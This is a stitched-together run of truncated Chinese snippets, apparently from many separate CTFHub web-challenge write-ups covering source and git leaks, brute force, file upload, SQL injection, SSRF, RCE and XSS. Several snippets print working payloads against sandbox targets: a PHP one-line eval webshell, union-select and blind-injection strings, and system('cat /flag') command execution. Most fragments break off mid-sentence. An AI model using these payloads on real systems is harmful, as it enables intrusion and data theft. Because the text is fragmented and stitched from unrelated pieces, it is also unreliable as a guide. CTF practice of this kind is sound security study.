1.bak文件 2.使用dirsearch进行扫描 python dirsearch.py -u http://challenge-d4234042e1d43e96.sandbox.ctfhub.com:10080/ -e * 3.下载bak文件,获取flag
1.根据题意,点击click,输入admin admin测试 2.根据测试,经过base64转义,下载附件发现是字典,采取爆破的办法 3.找到响应码200的那条,打开,将转义后的编码重新解密 4.获得正确的账号密码,登录获得flag
目录遍历和phpinfo没什么难度,基本就是一个一个找就行了 练习题目都挺简单的,希望大家尽量先不要看解法自己做一下试试。 备份文件下载:当开发人员在线上环境中对源代码进行了备份操作,并且将备份文件放在了 web 目录下,就会引起网站源码泄露。 一、网站源码:这个已经给出了明确的提示
根据题目提示去查看源代码中的js脚本 在函数checkfilesuffix()中定义了一个白名单whitelist,通过变量file_suffix可以看出该网站需要验证的是上传文件的后缀, indexOf()返回-1时说明未查找到字符串,综上可得出上传的文件只能是以.jpg、.png、.gif为后缀的 得出这一结论后,
由题目可以知道,网站对于我们上传的任何文件都不做验证 可以确定思路:上传木马->获取靶机shell->在网站中寻找flag 我们先构造一个一句话木马:<?php @eval($_POST["pass"]);?> 保存为test.php上传至网站中 可以得到上传文件的相对路径:u
手工注入 输入1,发现存在两个注入点 验证两个注入点:0 union select 1,2 得到所使用的的数据库信息和版本信息:0 union select database(),version (返回的字段数必须和注入点数量一致) 通过数据库去查找表:0 union select 1,group_
CTFHub SQl注入 时间盲注(sqlmap) 0x00 简单介绍 这篇文章主要通过 CTFHub 时间盲注案例简单记录一下 sqlmap 的使用流程。 参考:sqlmap用户手册 | WooYun知识库 (xmd5.com) sqlmap 的功能: 1、判断可注入的参数 2、判断可以用那种SQL注入技术来注入 3、识别出哪种数据库 4、
为了不打乱节奏, 先放上官方的 writeup 等我整明白了 在写一篇自己的理解 传送门
考点 php伪协议 file协议 分析过程 Shell是这个 使用hackbar 构造Playload传参 http://challenge-deb7e7e0db233e27.sandbox.ctfhub.com:10800/shell.txt ctfhub=system('ls /'); ctfhub=system('cat /flag'); 得到flag ctfhub{3a551fa301f8dda0dccd2c7d} php://input
Day3 CTFhub 1.信息泄露-git 1.1 Log (1)GitHack GitHack下载地址:https://github.com/lijiejie/GitHack GitHack是一个.git泄露利用测试脚本,通过泄露的文件,还原重建工程源代码。 python3 dirsearch.py -u <url> -e * 发现了git泄露 (2)使用GitHack进行文件恢复 python2 GitHack.
还是用desearch工具扫描然后发现hg泄露 用dvcs-ripper这个工具里的hg泄露工具处理 处理完以后看爆出来的文件夹,还是要注意一下因为是隐藏文件,要用ls -al命令 然后进行目录遍历 这里最后出现这个提示以后,我们试试直接访问那个txt ok了
根据网站提示,可知只要测试出网站源码备份的文件名称即可通过备份内容得出flag,故自制测试脚本 import requests url=(input("URL:")) list1=['web', 'website', 'backup', 'back', 'www', 'wwwroot', 'temp'] list2=['tar'
php://filter php://filter 读取源代码并进行base64编码输出,不然会直接当做php代码执行就看不到源代码内容了。 PHP.ini: php://filter在双off的情况下也可以正常使用; allow_url_fopen :off/on allow_url_include:off/on 举例: http://127.0.0.1/cmd.php?file=php://filter/read
文章目录 七星难度SQL注入-2(字符布尔盲注)namp(nmap命令注入)shrine(Jinja SSTI)Web1(sql注入过滤)easy_login(nodejs JWT攻击) 七星难度 SQL注入-2(字符布尔盲注) fuzz admin字段发现会有两种结果账号不存在,和账号和密码错误 测试payload分别为admin' and 1=1 and 'tt
CTFHUB-RCE漏洞总结(二) 一级目录一级目录一级目录一级目录 链接: CTFHUB-RCE漏洞总结(一). 一级目录 一级目录 一级目录 一级目录
~目录~ 开始内网访问伪协议读取文件端口扫描POST请求上传文件FastCGI协议Redis协议URL Bypass数字IP Bypass302跳转 BypassDNS重绑定 Bypass 开始 redis真不会…,求会的师傅评论区教教我 内网访问 提示:尝试访问位于127.0.0.1的flag.php吧 直接url=127.0.0.1/flag.php 伪
根据题目提示,去搜索北京亿中邮信息技术有限公司邮件网关的默认口令 最后得到flag
文章目录 一、什么是Git泄露?二、进入环境2.查看页面3.使用dirsearch扫描目录4.利用GitHack工具扫描4.使用git log查看历史记录 三、flag1.使用git diff对比文件得到flag:==ctfhub{7695df0273bfd39a86c8ecd4}== 2.利用git reset回退文件版本1)打开文件发现flagflag:==ctfhub{7
前言 在CTFHUB这个平台上看到了有一组题是HTTP类型的。还蛮好奇的,想着试着玩儿一下。 请求方式 方法一 上面提示我们HTTP协议中定义了八种请求方法。这八种都有: 1、OPTIONS 返回服务器针对特定资源所支持的HTTP请求方法,也可以利用向web服务器发送‘*’的请求来测试服务
弱口令 打开环境进去后直接用户名:admin;密码:123456登录就拿到flag 默认口令 然后我们进入到环境里 是eyou邮件网此题提示我们使用默认口令,去搜索北京亿中邮信息技术有限公司邮件网关的默认口令 尝试登录一下 就可以拿到flag
前言 又来更博了~~今天我们学习一下信息泄漏的相关知识,利用CTFhub上面的题,了解一下。 目录遍历 第一关,我们先打开靶场 我们先点击一下,打开之后,发现这是是apache的目录遍历 那我们挨个的找一下 在这里发现了flag.txt,打开,便找到了flag PHPINFO
应用有时需要调用一些执行系统命令的函数,当服务器没有经过严格过滤用户的参数,这时候就可能导致命令执行,从而导致命令执行漏洞 常用命令执行函数 system(): 该函数会把执行结果输出。passthru(): 该函数只调用命令,并把运行结果原样地直接输出没有返回值exec(): 不输
目录遍历 import requests url = "http://challenge-6225e10eca4ac8d8.sandbox.ctfhub.com:10080/flag_in_here" for i in range(1,5): for j in range(1,5): url_final = url + "/" + str(i) + "/" + str(j) r = request
进入环境 得到这种提示,于是自己编写一个程序来跑一下目录 url = "http://challenge-e749c0aceae6a664.sandbox.ctfhub.com:10080/" file = ['web', 'website', 'backup', 'back', 'www', 'wwwroot', 'temp'] houz =
Ctfhub解题 web XSS反射型 介绍:记录解题过程 XSS Reflex提交1,弹窗 利用XSS platform平台 在XSS platform平台上面注册一个账号,创建一个项目:(根据提示创建即可) 配置 查看代码 根据提示,把XSS平台给出的代码复制到第一个输入框(XSS Reflex)中进行注入 提交后,在